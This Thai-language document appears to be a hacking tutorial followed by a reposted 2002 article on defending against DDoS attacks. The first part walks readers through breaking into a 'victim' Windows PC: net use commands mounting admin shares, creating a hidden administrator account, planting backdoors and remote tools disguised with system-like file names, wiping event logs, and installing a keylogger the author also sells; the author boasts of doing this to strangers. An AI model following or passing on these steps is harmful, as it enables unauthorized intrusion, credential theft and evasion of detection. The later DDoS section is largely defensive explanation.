ลองคิดดูว่าถ้าเป็นบริษัทที่ มีการแข่งขันกัน อย่างการประมูลราคางานต่างๆ ถ้าโชคดีเข้าไปดูไฟล์ที่บริษัทคู่แข่งส่งประมูล คิดดูว่าบริษัทผมจะได้เปรียบขนาดไหน เวลายื่นซองประมูลงาน เงินที่ผมประมูลต่างจากบริษัทคู่แข่งแค่ 10 บาท เพียงแค่นี้กลายเป็นว่าบริษัทผมชนะการประมูล คิกๆ เรื่องข้อมูล สมัยนี้ถือว่าสำคัญมากๆ เอาเป็นว่าถ้าใครมีข้อมูลเยอะกว่า แน่นอนกว่า จะได้เปรียบมากกว่า จริงมั้ยครับ แต่ผมมักสนใจกับไฟล์รูปมากกว่าอ่า.... ไม่โหดพอ

การ Map Drive

และหลังจากที่ คุณได้สร้าง User Admin ในเครื่องเหยื่อได้แล้วที่ชื่อ hacker และมี password เป็น passhack และก่อนหน้านี้คุณได้แสกนเครื่องเหยื่อแล้วว่าเครื่องเหยื่อได้เปิด share ที่ไดร์ฟ C: (ถ้า งง กลับไปอ่านเรื่อง scan ใหม่ คลิกนี่เลย)ให้คุณพิมพ์คำสั่งด้านล่างนี้เพื่อเข้าไป MapDrive C: ของเครื่องเหยื่อ

net use \\ 203.114.234.5 \ C$ passhack /u:hacker

คำ สั่งบนนี้ จะเป็นการเชื่อมต่อไปที่ share drive c: ในเครื่องเป้าหมาย โดย PasswordAdmin เป็นสิ่งที่ได้มาจากขั้นตอนด้านบนเรียบร้อยมาแล้วนะครับ โดยเครื่องนั้นต้องเปิด share C$ มาก่อนหน้านี้ แต่ถ้าคุณได้ใช้คำสั่งนี้แล้วยังเชื่อมต่อ (connect) ยังไม่ได้อีกคุณอาจต้องพิมพ์

net use \\ 203.114.234.5 \ C$ passhack /u:203.114.234.5\ hacker

โดยเพิ่ม 203.114.234.5 มาตรงหน้า user Admin ขึ้นมาครับหรือ

net use \\ 203.114.234.5 \ C$ passhack /u:ชื่อเครื่องเหยื่อหรือชื่อ domain\ hacker

แต่ถ้าพิมพ์เป็น net use \\ ...IP เหยื่อ.. \D$ passhack /u: hacker

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

ซึ่ง ตอนนี้อาจลองเช็คดู IP ที่หน้าต่างดอสนี้โดยลองพิมพ์ ipconfig หรือใช้คำสั่ง dir ในหน้าต่างนี้ เพื่อให้แน่ใจว่าเป็นเครื่องเป้าหมาย ถ้าลองดูแล้วเป็นเครื่องเป้าหมายจริงๆ ก็เหมือนกับคุณได้นั่งอยู่หน้าเครื่องเป้าหมายจริงๆ การพิมพ์คำสั่งต่างๆในหน้าต่างนี้ ก็คือการสั่งคำสั่งต่างๆในเครื่องเป้าหมาย ไม่ใช่เครื่องคุณ และคุณอาจส่งไฟล์ไปโดยโปรแกรม remote เพื่อที่จะสร้างทางลับต่าง เพื่อที่จะเข้าไปควบคุมอีก ในโอกาสหน้า การส่งโปรแกรมไปนั้น ดูวิธีได้จาก link Backdoor

อีกวิธีแบบง่ายๆ ไม่ต้องยุ่งยากแบบวิธีด้านบน

Terminial Service นั้นจะเป็นการอนุญาตให้ Admin สามารถรีโมทมากระทำการแก้ไขส่วนต่างๆภายในคอมพิวเตอร์จากระยะไกล ได้โดยเป็น mode graphic ถ้าไม่อย่างนั้น คุณก็ต้องใช้โปรแกรม tftp32.exe โดยใช้บนดอสแบบวิธีด้านบน ถ้าเครื่องเหยื่อไม่ได้เปิด Terminial Service แล้ว คุณจะใช้วิธีแบบที่ผมสาธิตข้างล่างนี้ไม่ได้

ให้เปิดโปรแกรม Windows Explorer ขึ้นมาก่อนครับแล้วทำตามรูปด้านล่าง

จะมีหน้าต่างขึ้นมาดังรูปด้านล่างนี้

จะเป็น drive ที่เราได้มาจากเครื่องเหยื่อ จะมาอยู่ที่ G: ของเครื่องเรา

ให้คุณใส IP เครื่องเหยื่อที่เราได้ และแชร์ที่คุณจะเข้าไปในเครื่องเหยื่อ ซึ่งเขียนได้แบบนี้

\\...IP เหยื่อ.. \IPC$ เป็นการเข้าไปที่ share ของเครื่องเป้าหมาย ** สำคัญมาก ** ซึ่งเครื่องเป้าหมายต้องเปิดรอเอาไว้และมีหลายๆตัว ที่คุณสามารจะใช้ได้ครับ IPC$ ใช้ได้ก็ต่อเมื่อ port 139 ของเครื่องเป้าหมายเปิดรออยู่ Listen นั่นเอง โดยคุณอาจแสกนไปที่เครื่องเป้าหมายก่อน ที่จะใช้คำสั่งนี้ คุณอาจเปลี่ยนไป connect เชื่อมต่อที่ share อื่นๆ ได้โดย

\\...IP เหยื่อ.. \C$

C$ เป็นการ connect เชื่อมต่อที่ share ของ drive C:

\\...IP เหยื่อ.. \D$

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

ให้คุณใส IP เครื่องเหยื่อที่เราได้ และแชร์ที่คุณจะเข้าไปในเครื่องเหยื่อ ซึ่งเขียนได้แบบนี้

\\...IP เหยื่อ.. \IPC$ เป็นการเข้าไปที่ share ของเครื่องเป้าหมาย ** สำคัญมาก ** ซึ่งเครื่องเป้าหมายต้องเปิดรอเอาไว้และมีหลายๆตัว ที่คุณสามารจะใช้ได้ครับ IPC$ ใช้ได้ก็ต่อเมื่อ port 139 ของเครื่องเป้าหมายเปิดรออยู่ Listen นั่นเอง โดยคุณอาจแสกนไปที่เครื่องเป้าหมายก่อน ที่จะใช้คำสั่งนี้ คุณอาจเปลี่ยนไป connect เชื่อมต่อที่ share อื่นๆ ได้โดย

\\...IP เหยื่อ.. \C$

C$ เป็นการ connect เชื่อมต่อที่ share ของ drive C:

\\...IP เหยื่อ.. \D$

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

จาก นั้นคุณก็กดปุ่ม Finish แล้วจะมีหน้าต่างขึ้นมา จากนั้นให้คุณใส่ Username Admin ของเครื่องเหยื่อ กับ Password ที่เราได้มาจากการทำ Brute Force หรือ Dump Password ที่เครื่องเหยื่อได้มาแล้ว

การปิดบังอำพราง(Covering)

ใน หัวข้อนี้ ไม่ได้มีอะไรมากเลยครับ จะเปรียบเทียบบางอย่างให้คุณฟังก่อนนะครับ ถ้าคุณไปย่องเบาที่บ้านใครก็ตาม เวลาเสร็จงานโจรกรรมต่างๆแล้วก็ต้องมีการทำลายหลักฐาน จริงมั้ยครับ การที่จะ Hack เครื่องใดๆก็ตามแต่ สำหรับผู้ที่ชำนาญแล้ว มักจะต้องลบร่องรอยต่างๆที่ได้กระทำเอาไว้ (หรือลบไฟล์ข้อมูลเหยื่อด้วย หรือป่าว! อย่าเชียวน๊า อย่าไปแกล้งเค้า) คุณแค่ลบไฟล์ ที่เป็นไฟล์ log ที่เก็บข้อมูลต่างๆเท่านั้นก็เพียงพอแล้ว และไฟล์ที่คุณได้ส่งเข้าไป หรือสร้างขึ้นมาบนเครื่องเหยื่อ ถ้ามันหมดประโยชน์แล้วก็ควรกำจัดทิ้งไปด้วย

นอกเรื่องอีกนิด

จาก ประสบการณ์ผม ที่เคยเจาะตามเครื่องต่างๆ รวมถึงบางเว็บไซด์ ผมจะส่งเมล์หรือเซฟ text file เอาไว้ที่เครื่องเหยื่อว่า เครื่องคุณมีช่องโหว่ นี่ไงหลักฐานว่าผมได้บุกเข้ามาในเครื่องคุณได้แล้ว และทิ้งเมล์ให้เค้าติดต่อกลับมา เชื่อมั้ย ไม่มีคนตอบกลับ มาซักคนเลยอ่า เราก็อุตสาห์เป็นคนดีมีจรรยาบรรณ มันเสือกดันไม่สนใจซะนี่ แย่เจงๆ พักหลังๆผมเลยเอาโปรแกรม remote ไปลงซะเลย คิกๆ ปรากฏว่า "วันๆมานเล่นแต่เกมส์ โอ้ววว... อนาคตเด็กไทย" แต่ดีนะไม่มีรูปโป้ ไม่งั้นเสร็จผม มานสนแต่เกมส์ บ้าเจง ไม่เห็นเหมือนเราเลย คิกๆ

โปรแกรม ที่ผมเคยใช้เล่นกันอยู่บ่อยก็คือโปรแกรม Cleareventlog.exe ซึ่งโปรแกรมนี้จะคอยลบไฟล์ต่างๆใน log ให้หมดสิ้นไป ส่วนโปรแกรมอื่นคุณลองหาจากใน Internet จาก google เองนะครับ การค้นหาก็คงไม่ยากเย็นอะไร

สรุป

-ไฟล์ ต่างๆที่คุณได้ส่งไปรันที่เครื่งอเหยื่อนั้น เช่นไฟล์ server ต่างๆไม่ว่าจะเป็นของ Backdoor Trojan Remote ต่างๆ การปิดบังที่ดีที่สุดคือ เปลี่ยนชื่อไฟล์เหล่านั้นให้เป็นชื่อคล้ายๆกับไฟล์ระบบ เช่น nodepad.exe หรือ NTsys.exe เพื่อให้เหยื่อเห็นแล้วไม่กล้าที่จะลบ

-ไฟล์ บางไฟล์เช่นไฟล์ที่เป็นตัวติดตั้งโปรแกรมเช่น bat file ที่คุณสร้างมาเพื่อติดตั้ง Backdoor Trojan Remote ต่างๆ ให้คุณทำการลบทิ้งด้วย หรือเพิ่มคำสั่งให้มันมีการลบตัวเอง

-หา โปรแกรมต่างๆที่กำจัด log ไฟล์ต่างๆ (โปรแกรมประเภทที่ไม่จำเป็นต้องติดตั้งที่เครื่องเหยื่อ) ที่สามารถรันได้เลยจะยิ่งดี เพราะมันจะทำการเคลียร์ ลบ หลักฐานต่างๆที่เราเข้าไปเจาะ ซึ่งบางทีมันอาจเก็บค่า IP รวมไปถึงการกระทำต่างๆ และเวลา ที่คุณได้กระทำเอาไว้

-อัน นี้อาจไม่เกี่ยวซักเท่าไหร่ "คุณอย่าเที่ยวไปเป่าประกาศตามเว็บบอร์ดหรือในหน่วยงาน ว่าฉ้านก็เป็น Hacker" เพราะ เมื่อเกิดเหตุการณ์ต่างๆที่ เป็นการเข้าข่ายโจรกรรมทางข้อมูลต่างๆในหน่วยงานคุณเอง หรือที่ไหนๆก็ตาม คุณนั่นแหละเป็นคนแรกที่จะซวย นิ่งไว้

การยกระดับสิทธิ(Admin Priviledge)

Keylog

โปรแกรม ประเภท Keylog คือเป็นโปรแกรมประเภท ดักจับข้อมูลต่างๆที่ที่ถูกพิมพ์ลงไปด้วย kebord หรือแป้นพิมพ์ที่คุณใช้อยู่เป็นประจำ จะเกิดอะไรขึ้นถ้าโปรแกรมประเภทนี้มาอยู่ที่เครื่องคุณ เหอๆ "ละเมิดสิทธิกันนี่หว่า" ถึงคุณจะโวยวายแบบนี้ไป ผมเชื่อว่า คนที่เอาโปรแกรมแบบนี้มาใส่ในเครื่องคุณ เค้าไม่สลดหลอกครับ คิกๆ

ลอง คิดดูว่า ตั้งแต่คุณเปิดเครื่องคอมใช้ คุณต้องพิมพ์อะไรลงไปบ้าง เวลาคุณเช็คเมล์ คุณต้องพิมพ์อะไรไปบ้าง "ให้ระวังร้าน Internet ให้ดีๆ อย่าไปเช็คเมล์หรือ login เข้าเว็บต่างๆในร้าน" เพราะถ้าเกิดมีผู้ไม่หวังดีแอบลงเอาไว้ แล้วคุณจะจ๋อย... เมื่อคุณโดนขโมย บางคนที่เป็น Webmaster และชอบไปใช้ร้าน Internet เพื่อ login ต่างๆไม่ว่าจะ mail หรืออะไรก็ตาม ผมเห็นมาเยอะแล้ว "โอ้วว...โน้... เว็บผมโดน hack เกียจจริงๆไอ้พวก hacker นี่ มันเลวเจงๆ อย่าให้กรูรู้นะว่าใคร " ผมว่าคุณโทษตัวเองดีกว่านะ

ส่วน โปรแกรมเท่าที่ผมลองใช้มีทั้งในดอส และเป็นแบบแสดงผลที่อ่านเข้าใจง่าย นั้นหาน้อยตัวที่จะรองรับภาษาไทย แต่ก็มีอยู่ 1 โปรแกรมที่ผมเคยใช้ และดีมากๆ ชื่อโปรแกรม StarMonitor ไม่มีปัญหากับภาษาไทยด้วย ขอบอก และยังสามารถดักจับ ภาพหน้าจอโดยการตั้งเวลาได้อีกด้วย และท้ายสุด โปรแกรมนี้สามารถที่จะส่งเมล์ไปหาคุณได้โดย อัตโนมัติด้วซิ น่ากลัวมั้ยครับส่วนโปรแกรมประเภทนี้ตัวอื่นๆ ผมไม่เคยได้ลองครับ คุณอาจหาได้จาก google โปรแกรมนี้มีอยู่ในแผ่น cd ที่ผมขายนะครับ(ไฟล์สอนเป็นไฟล์ vdo)ติดต่อ Webmaster

Exploit

วิธี การนี้ คุณจะต้องทำหลังจาก Access เข้าไปในเครื่องเหยื่อได้แล้ว หรือคุณสามารถที่จะนั่งอยู่หน้าจอเครื่องเหยื่อได้ ถ้าไม่เข้าใจไปอ่านที่นี่ครับ Gaining Access เมื่อคุณ Access หรือเข้าไปในเครื่องเหยื่อจากระยะไกลได้แล้วถึงจะทำวิธีตามที่ผมบอกในด้าน ล่างนี้

วิธีที่เนียนที่สุด ให้คุณสร้าง Account ใหม่ลงไปบนเครื่องเหยื่อ แล้วทำให้ Account ใหม่ที่สร้างขึ้นมาเป็น Admin (ในกรณีที่ admin ในเครื่องเหยื่อได้กำลังใช้งานอยู่ ในตอนที่คุณ hack วิธีด้านบนได้แล้ว) โดยพิมพ์คำสั่งด้านล่างนี้ลงไปที่หน้าต่างดอสของเครื่องเหยื่อ แล้วคุณก็ได้ขโมยหน้าต่างดอสมาได้แล้วด้วย ทำได้โดยพิมพ์แต่ละบรรทัดต้องกด enter ทุกครั้ง มี 2 บรรทัดดังนี้

net user hacker passhack /add

net localgroup Administrators hacker /add

(คำ สั่งตรงที่ตัวอักษร สีเหลือง นั้น คุณสามารถเปลี่ยนได้ตามต้องการ แต่ต้องจำไว้ด้วยว่าตั้งชื่อ/ pass อะไรลงไป เพื่อที่จะเข้าไปคุมเครื่องเหยื่อเครื่องนี้อีกเมื่อไหร่)

บรรทัดแรก จะเป็นการสร้าง user ชื่อ hacker ขึ้นมาในเครื่องเหยื่อ และให้ user นี้มี password เป็น passhack

บรรทัด ที่ 2 จะเป็นการทำให้ ชื่อ user ที่ชื่อ hacker ที่เราได้ทำไปในบรรทัดที่ 1 นั้นเป็น Administrator (ให้เติมตัว “s” ลงไปที่ท้าย Administrator ด้วยดังตัวอย่างที่ผมเขียน)

หลังจากที่คุณได้สร้างคำสั่ง เพิ่ม user ด้านบนนี้แล้ว คุณจะยังไม่สามารถใช้ user ตัวที่คุณสร้างใหม่ได้จนกว่า เครื่องเหยื่อได้มีการ ล็อกเอาท์ออกไปก่อน โดยคุณอาจส่งโปรแกรม shutdown ไปที่เครื่องเหยื่อก่อน แล้วสั่ง shutdown แต่คุณต้องจำชื่อเครื่องด้วยนะครับ เพราะว่าครั้งต่อไปที่ต่อเน็ต คุณลองแสกนหาชื่อเครื่องนั้นๆให้เจอก่อน แล้วค่อยเข้าไปโดย user ที่คุณได้ตั้งมาใหม่ด้วยคำสั่ง net use ในดอส หรืออาจทำการ Map Drive ก็ได้

Map Drive คือการที่เอาไดรว์ของเครื่องเป้าหมาย มาอยู่ในเครื่องคุณเอง ซึ่งจะเปรียบเหมือนว่าเป็นไดรว์ตัวนึง ในเครื่องคุณเองครับ ซึ่งเมื่อทำสำเร็จแล้ว คุณจะเห็นไฟล์ทุกอย่างในเครื่องเป้าหมายในเครื่องคุณเอง สามารถ copy ย้าย ได้ แต่ ขอเตือน ว่า ถ้ารันโปรแกรมในหน้าต่าง Win Explorer นั้น หมายถึงเป็นการ รันโปรแกรมที่เครื่องคุณนะครับ ไม่ใช่เครื่องเป้าหมาย คลิกที่นี่เร้ย

การจู่โจมระบบ(Denial of Service) 

เรียบเรียงโดย : ภูวดล ด่านระหาญ
เผยแพร่เมื่อ : 30 มกราคม 2545


การโจมตีแบบ Distributed Denial of Service (DDoS) มักจะนำเครื่องมือที่จะใช้ในการโจมตีไปติดตั้งบนเครื่องที่ถูกเจาะไว้แล้ว ซึ่งมีจำนวนพอสมควร จากนั้นจึงจะระดมส่งข้อมูลในรูปแบบที่ควบคุมได้โดยผู้ควบคุมการโจมตีไปยัง เหยื่อหรือเป้าหมายที่ต้องการ ซึ่งการโจมตีรูปแบบนี้มักจะก่อให้เกิดการใช้แบนด์วิดธ์อย่างเต็มที่จนผู้ อื่นไม่สามารถใช้งานได้ตามปกติ หรือทำให้ระบบที่ถูกโจมตีไม่มีทรัพยากรเหลือพอที่จะให้บริการผู้ใช้ธรรมดา ได้

การป้องกันการโจมตีแบบ DoS นั้น จะสามารถทำได้ก็ต่อเมื่อทราบวิธีของการโจมตีก่อน และการป้องกันการโจมตีในบางครั้งก็ไม่สามารถทำได้ในครั้งเดียว ขึ้นอยู่กับรูปแบบการโจมตี สถาปัตยกรรมของเป้าหมายที่ถูกโจมตี ซึ่งการป้องกันอาจจะได้ผลหรือล้มเหลวก็ขึ้นอยู่กับปัจจัยเหล่านี้คือ
การมีคู่มือหรืเอกสารการใช้งานของระบบเป้าหมายที่ถูกโจมตี
การตรวจจับการโจมตีสามารถทำได้อย่างรวดเร็วและสามารถค้นหาต้นตอที่แท้จริงได้
มีวิธีดำเนินการสนองตอบเหตุการณ์ละเมิดความปลอดภัยอย่างเป็นขั้นตอน (incident response)
และการป้องกันรูปแบบอื่นที่สามารถทำได้

รูปแบบการโจมตีและการป้องกัน

เครื่อง มือที่ใช้โจมตีแบบ DDoS มีใช้กันอย่างแพร่หลายมานานหลายปีแล้ว และบรรดาผู้ผลิตเองต่างก็มีวิธีป้องกันการโจมตีเช่นเดียวกัน รูปแบบการโจมตีที่นิยมใช้กันก็มีอย่าง SYN flood, UDP flood, ICMP flood, Smurf, Fraggle เป็นต้น ซึ่งจะได้ศึกษาในรายละเอียดและวิธีป้องกันกันต่อไป

SYN Flood

เป็น การโจมตีโดยการส่งแพ็คเก็ต TCP ที่ตั้งค่า SYN บิตไว้ไปยังเป้าหมาย เสมือนกับการเริ่มต้นร้องขอการติดต่อแบบ TCP ตามปกติ (ผู้โจมตีสามารถปลอมไอพีของ source address ได้) เครื่องที่เป็นเป้าหมายก็จะตอบสนองโดยการส่ง SYN-ACK กลับมายัง source ip address ที่ระบุไว้ ซึ่งผู้โจมตีจะควบคุมเครื่องที่ถูกระบุใน source ip address ไม่ให้ส่งข้อมูลตอบกลับ ทำให้เกิดสภาวะ half-open ขึ้นที่เครื่องเป้าหมาย หากมีการส่ง SYN flood จำนวนมาก ก็จะทำให้คิวของการให้บริการของเครื่องเป้าหมายเต็ม ทำให้ไม่สามารถให้บริการตามปกติได้ นอกจากนี้ SYN flood ที่ส่งไปจำนวนมาก ยังอาจจะทำให้เกิดการใช้แบนด์วิดธ์อย่างเต็มที่อีกด้วย

การป้องกัน Cisco Router

เรา เตอร์ของ Cisco มีฟังก์ชันการทำงานชื่อ TCP Intercept ซึ่งถูกออกแบบมาเพื่อต่อต้านการโจมตีแบบ SYN flood โดย TCP intercept software จะพยายามสร้างการเชื่อมต่อกับ client หากสำเร็จการเชื่อมต่อดังกล่าวก็จะถูกส่งไปให้กับเครื่องให้บริการต่อไป ดังนั้นการโจมตีแบบ SYN flood จะไม่สามารถเข้าไปถึงเครื่องเป้าหมายจริงๆ ได้ และเราเตอร์ก็ถูกออกแบบให้รองรับการเชื่อมต่อได้มากกว่าเครื่องให้บริการ (server) อีกด้วย แต่ก็มีข้อเสียคือจะทำให้เราเตอร์ใช้ทรัพยากรมากกว่าปกติ รายละเอียดเพิ่มเติมศึกษาได้จาก http://www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/113ed_cr/secur_c/scprt3/scdenial.htm

นอก จากนี้เราเตอร์ของ Cisco ยังมีฟังก์ชันชื่อ Committed Access Rate (CAR) ซึ่งใช้ในการจำกัดแบนด์วิดธ์ที่ใช้สำหรับแต่ละบริการได้ (แก้ไขได้ผ่านทาง extended access control list) ซึ่งไม่เพียงแต่ป้องกันการโจมตีแบบ SYN flood ยังป้องกันการเชื่อมต่อที่ถูกต้องไม่ให้ใช้แบนด์วิดธ์มากเกินไป ซึ่งข้อเสียในการนำไปใช้งานคือในขณะที่เครื่องเป้าหมายถูกโจมตีจะทำให้การ เชื่อมต่อจากผู้ใช้ธรรมดาไม่สามารถทำได้ เทคนิคหนึ่งในการนำ CAR ไปใช้งานคือ การจำกัดการเข้าถึงโดยระบุเป็นจำนวน client ที่สามารถเข้าใช้งานได้

Checkpoint FW-1

FW-1 มีฟังก์ชั่นชื่อ SYN Defender ซึ่งถูกออกแบบมาเพื่อต่อต้านการโจมตีแบบ SYN flood โดยใช้หลักการเช่นเดียวกันกับ Cisco's TCP Intercept ซึ่งจะทำให้ SYN packet ถูกหยุดยั้งไว้ที่ FW-1 เช่นเดียวกันกับ Cisco's TCP Intercept ตัว FW-1 เองก็จะใช้ทรัพยากรมากกว่าปกติในการทำงานในลักษณะดังกล่าว

ICMP Flood
เป็นการส่งแพ็คเก็ต ICMP จำนวนมากไปยังเป้าหมาย ทำให้เกิดการใช้งานแบนด์วิดธ์เต็มที่

การป้องกัน

ระบบ ส่วนใหญ่สามารถทำงานได้โดยไม่ต้องใช้ ICMP Echo Request ซึ่งสามารถป้องกันการใช้งานได้โดยใช้คำสั่งที่เราเตอร์หรืออุปกรณ์กรองแพ็ค เก็ตอื่นๆ

UDP Flood

เป็น การส่งแพ็คเก็ต UDP จำนวนมากไปยังเป้าหมาย ซึ่งทำให้เกิดการใช้แบนด์วิดธ์อย่างเต็มที่และ/หรือทำให้ทรัพยากรของเป้า หมายถูกใช้ไปจนหมด โดยจะส่ง UDP packet ไปยัง port ที่กำหนดไว้ เช่น 53 (DNS)

การป้องกัน

เราเตอร์และอุปกรณ์กรองแพ็คเก็ตอื่นๆ สามารถ drop แพ็คเก็ตที่มุ่งโจมตีมายัง port ที่ไม่เป็นที่ต้องการได้ เช่น โจมตีมายัง port ที่ไม่ได้ให้บริการใน port ดังกล่าว ในกรณีที่เป็นการโจมตีเฉพาะ port ที่เปิดให้บริการ เช่น port 53 ก็สามารถป้องกันระบบเป้าหมายได้โดยใช้ CAR เพื่อจำกัดจำนวนข้อมูล

Smurf 

ผู้ โจมตีจะส่ง ICMP Echo Request ไปยัง broadcast address ในเครือข่ายที่เป็นตัวกลาง(ปกติจะเรียกว่า amplifier) โดยปลอม source ip address เป็น ip address ของระบบที่ต้องการโจมตี ซึ่งจะทำให้เครือข่ายที่เป็นตัวกลางส่ง ICMP Echo Reply กลับไปยัง ip address ของเป้าหมายทันที ซึ่งทำให้มีการใช้งานแบนด์วิดธ์อย่างเต็มที่

การป้องกัน

เช่น เดียวกันกับการโจมตีแบบ ICMP flood เราเตอร์และอุปกรณ์กรองแพ็คเก็ตอื่นๆ สามารถ drop ICMP Echo Reply ซึ่งในกรณีนี้ควร drop ICMP Echo Reply ที่ส่งเข้ามาโดยไม่ได้มีการส่ง ICMP Echo Request ออกไปก่อน ซึ่งการทำงานลักษณะนี้อาจจะทำให้อุปกรณ์ packet filtering ใช้ทรัพยากรเพิ่มขึ้น และในกรณีที่เกิดการโจมตีขึ้นแล้วยังสามารถบล็อก source ip address ของ ICMP Echo Reply ได้ เพราะผู้โจมตีไม่สามารถเปลี่ยนแปลงข้อมูลส่วนนี้ได้

สำหรับ ผู้ดูแลระบบทั่วไปควรป้องกันไม่ให้ระบบของตัวเองถูกใช้เป็น amplifier โดยการไม่ตอบสนองต่อแพ็คเก็ตที่ส่งเข้ามายัง broadcast address ซึ่งมีวิธีการแก้ไขแยกตามระบบที่ http://www.pentics.net/denial-of-service/white-papers/smurf.cgi

Fraggle

เป็น อีกรูปแบบหนึ่งของการโจมตีแบบ Smurf โดยผู้โจมตีจะส่ง UDP Echo Request (UDP port 7) ไปยัง broadcast address ของ amplifier network โดยปลอม source ip address ไปเป็น ip address ของเป้าหมาย ซึ่งทำให้มีการใช้งานแบนด์วิดธ์อย่างเต็มที่ และ/หรือทำให้มีการใช้ทรัพยากรของเป้าหมายจนหมดไป ซึ่งการโจมตียังสามารถใช้ได้กับ UDP, TCP services อื่น เช่น Chargen อีกด้วย

การป้องกัน

สามารถ ป้องกันได้คล้ายๆ กับการป้องกันการโจมตีแบบ Smurf attack โดยใช้เราเตอร์หรืออุปกรณ์กรองแพ็คเก็ตอื่นๆ drop แพ็คเก็ต UDP/TCP ที่ใช้โจมตีเข้ามา หรืออาจจะใช้วิธีบล็อก source ip address ได้เช่นเดียวกัน

สำหรับผู้ดูแลระบบทั่วไปควรป้องกันไม่ให้ ระบบของตัวเองถูกใช้เป็น amplifier โดยการไม่ตอบสนองต่อแพ็คเก็ตที่ส่งเข้ามายัง broadcast address ซึ่งมีวิธีการแก้ไขแยกตามระบบที่ http://www.pentics.net/denial-of-service/white-papers/smurf.cgi 

อย่าง ไรก็ตามผู้ดูแลระบบควรยกเลิกการใช้งาน UDP, TCP service บางตัวเช่น Echo, Chargen, Discard ซึ่งไม่มีความจำเป็นในการใช้งานอีกแล้ว ซึ่งสำหรับเราเตอร์ของ Cisco แล้ว สามารถใช้คำสั่งด้านล่างนี้เพื่อยกเลิกบริการดังกล่าว

no service udp-small-servers
no service tcp-small-servers

การโจมตีรูปแบบอื่นๆ

การโจมตีรูปแบบอื่นๆ สามารถเกิดขึ้นได้ จำเป็นต้องมีการตรวจสอบและป้องกันแก้ไขตามเหตุการณ์ที่เกิดขึ้น

จะทำอย่างไรเมื่อถูกโจมตี

การ โจมตีที่เกิดขึ้นมักจะทำให้เกิดการใช้งานแบนด์วิดธ์จนเต็มที่ เช่น SYN flood ถ้าหากทำการกรองแพ็คเก็ตที่ ISP ได้ ก็จะสามารถลดผลกระทบที่จะเกิดขึ้นได้

ติดตั้ง hardware ที่มีขีดความสามารถสูงไว้ระหว่างเครือข่ายของ ISP กับของระบบที่ต้องการป้องกัน เช่น การติดตั้งเราเตอร์ประสิทธิภาพสูง ที่สามารถทำ filtering ได้

โดยปกติการโจมตีแบบ DoS ผู้โจมตีมักจะโจมตีไปยังเป้าหมายโดยระบุเป็น ip address โดยตรง ไม่ได้ผ่านการทำ DNS lookup มาก่อน ดังนั้น เมื่อเกิดการโจมตีขึ้น ยังสามารถหาหนทางหลบหลีกการโจมตีดังกล่าวได้ 2 วิธีคือ 1. เปลี่ยน ip address เมื่อเกิดการโจมตี 2. เปลี่ยน ip address ไปเรื่อยๆ แม้จะไม่มีการโจมตี ซึ่งการกระทำทั้งสองรูปแบบก็มีข้อดีข้อเสียต่างกัน ในรูปแบบแรกจะต้องมีระบบตรวจจับที่ดี สามารถแจ้งเตือนผู้ดูแลระบบให้สามารถปรับเปลี่ยน ip address ได้อย่างรวดเร็ว จะเห็นว่ามีช่องว่างระหว่างการดำเนินงานอยู่ แต่ก็มียังมีข้อดีที่ผู้โจมตีจะไม่สามารถรู้แทกติกนี้จนกว่าจะเริ่มโจมตี ในขณะที่วิธีที่สองจะมีความยากลำบากในการเริ่มโจมตีมากกว่า

มีวิธีปฏิบัติที่ใช้ได้จริงซึ่งต้องการการแก้ไขเพียงเล็กน้อย และพยายามลดผลกระทบที่จะเกิดขึ้นกับผู้ใช้ให้น้อยที่สุด ดังนี้

การแก้ไข DNS

การ แก้ไข DNS entries โดยเปลี่ยน ip address ของระบบที่กำลังถูกโจมตีไปเป็น ip address ใหม่ ให้พยายามลดค่า TTL ของ DNS record ให้น้อยที่สุดเท่าที่จะเป็นไปได้ และพิจารณาว่าควรย้าย DNS server ไปยังลิ้งค์อื่นที่ไม่ใช่ลิ้งค์เดียวกันกับระบบที่กำลังถูกโจมตี โดยพิจารณาได้จาก traffic ที่จะเกิดขึ้นจาก DNS server เครื่องนี้ นอกจากนี้ควรตรวจสอบ secondary DNS server ด้วยว่ามีความพร้อมในการทำงานหรือไม่หาก primary DNS server มีปัญหา

Network Address Translation

หาก ระบบที่ถูกโจมตีสามารถใช้งาน NAT ได้ ก็จะทำให้ง่ายในการเปลี่ยน ip address หากไม่มี NAT ถูกติดตั้งในระบบไว้แล้ว ก็ควรติดตั้งเพิ่มเติม โดยปกติแล้วเราเตอร์ก็มีความสามารถนี้ นอกจากนี้ควรพิจารณาถึงระบบที่สามารถทำ load balancing ได้ เพื่อกระจายภาระงานให้ทั่วถึง

filter ค่า ip address เดิม

traffic ที่เข้ามายัง ip address ตัวเดิมจะมีแค่ traffic ที่เกิดจากการโจมตี และจากผู้ใช้ที่ยังใช้ค่า DNS entry เก่าเท่านั้น(ซึ่งเกิดจากการกระจายตัวของ DNS entry นั้นจะต้องใช้เวลาซักระยะ) ดังนั้นจึงสามารถบล็อก traffic สำหรับ ip address นี้ได้ หากไม่ต้องการให้ traffic ของ ip address ชุดเดิมเข้ามาภายในระบบก็สามารถทำได้โดยการยกเลิก routing สำหรับ ip address เดิมเสีย
ใช้ ip address ชุดใหม่และลิ้งค์ที่แตกต่าง

มี วิธีแก้ไขที่ได้ผลอีกวิธีคือ การเปลี่ยนไปใช้ลิ้งค์ชุดใหม่และ ip address บล็อกใหม่ทั้งหมด หากผู้โจมตีหยุดการโจมตีและเปลี่ยนเป้าหมายเป็น ip address ชุดใหม่ ผู้ดูแลระบบก็สามารถเปลี่ยน ip address และลิ้งค์กลับไปเป็นลิ้งค์เดิมได้

การป้องกันการโจมตี DNS server

การ ป้องกันการโจมตีที่กล่าวมาด้านบนนี้ อาศัยฟังก์ชันการทำงานของ DNS server เพื่อกระจายข่าวการเปลี่ยน ip address ชุดใหม่ ดังนั้นผู้โจมตีอาจจะเปลี่ยนเป้าหมายมาเป็น DNS server ก็เป็นได้ โดยสามารถโจมตีมายัง port 53 ทั้ง UDP flood หรือ SYN flood ได้  

มีวิธีป้องกันดังต่อไปนี้

วางเครื่อง primary DNS server ไว้ในลิ้งค์ที่แยกต่างหาก
สำรองข้อมูลของ primary DNS server ไปยังที่ตั้งแห่งใหม่
สร้าง secondary DNS server ไว้ในหลายๆ จุด บนลิ้งค์ที่แตกต่างกัน
ใช้ primary DNS server ที่ผู้อื่นมองไม่เห็น (unadvertised) และเชื่อมโยงไปยัง secondary DNS server โดยลิ้งค์ที่แยกต่างหาก
